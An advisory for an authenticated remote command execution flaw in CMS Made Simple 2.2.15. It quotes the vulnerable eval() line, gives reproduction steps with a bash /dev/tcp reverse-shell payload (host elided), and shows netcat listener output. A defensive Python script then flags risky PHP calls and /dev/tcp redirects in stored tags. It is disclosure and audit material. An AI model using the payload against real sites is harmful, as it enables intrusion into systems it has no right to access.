CMS Made Simple 2.2.15 Remote Command Execution

CMS Made Simple version 2.2.15 suffers from an authenticated remote command execution vulnerability.

# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage:
# Software Link:
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info:

The vulnerability is in "editusertag.php" at line #93, where user input is passed to the PHP eval() function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Log in as an administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 53690
uid=1(daemon) gid=1(daemon) groups=1(daemon)
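
Because User Defined Tag bodies are handed to eval(), a defender can audit the stored tags for code that starts processes. The following is an added example, not part of the original advisory or of CMS Made Simple; it assumes the tag bodies have already been exported into a name-to-code mapping, and the rule list and sample tags are constructed for illustration.

```python
import re

# PHP function names are case-insensitive, hence re.I. The lookbehind skips
# method calls ($db->exec), static calls (Foo::exec) and longer names (my_exec).
def _call(names):
    return re.compile(r"(?<![\w$>:])(?:%s)\s*\(" % "|".join(names), re.I)

# Rule set chosen for this example; it is a triage list, not a complete one.
RULES = [
    ("process-exec", _call(["exec", "shell_exec", "system", "passthru",
                            "popen", "proc_open", "pcntl_exec"])),
    ("nested-code-eval", _call(["eval", "assert", "create_function"])),
    ("backtick-shell", re.compile(r"`[^`]+`")),
    ("dev-tcp-redirect", re.compile(r"/dev/(?:tcp|udp)/")),
    # A call through a variable hides the function name: flag for manual review.
    ("dynamic-call", re.compile(r"\$\w+\s*\(")),
]

def audit_udt(code):
    """Return [(rule, line_number, matched_text)] for one tag body."""
    findings = []
    for lineno, line in enumerate(code.splitlines(), 1):
        for rule, pattern in RULES:
            match = pattern.search(line)
            if match:
                findings.append((rule, lineno, match.group(0)))
    return findings

def audit_all(tags):
    """Map tag name -> findings, keeping only tags with at least one hit."""
    results = {name: audit_udt(code) for name, code in tags.items()}
    return {name: hits for name, hits in results.items() if hits}

# Constructed sample input: tag name -> PHP body. "page_payload" is the
# step 2 payload exactly as printed on this page (host and port elided there).
SAMPLE_TAGS = {
    "copyright_year": 'echo date("Y");',
    "page_payload": r'''exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'");''',
    "indirect": '$handler = $params["fn"];\necho $handler("x");',
}

if __name__ == "__main__":
    for name, hits in audit_all(SAMPLE_TAGS).items():
        for rule, lineno, text in hits:
            print(f"{name}:{lineno}: {rule}: {text}")
```

A clean result only means none of these patterns matched; any tag flagged as dynamic-call still needs to be read by a person.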
